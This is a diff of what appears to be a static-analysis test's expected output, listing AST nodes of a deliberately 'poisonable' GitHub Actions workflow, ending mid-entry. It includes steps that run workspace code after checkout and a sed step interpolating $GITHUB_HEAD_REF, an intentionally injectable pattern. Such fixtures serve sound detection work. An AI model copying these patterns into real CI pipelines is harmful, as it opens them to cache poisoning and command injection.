| on: push | -| 
.github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | 
.github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . 
venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . 
venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| 
.github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| 
.github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | 
.github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | 
.github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| 
.github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile 
js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | 
.github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | 
.github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| 
echo "bar" | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | 
.github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = 
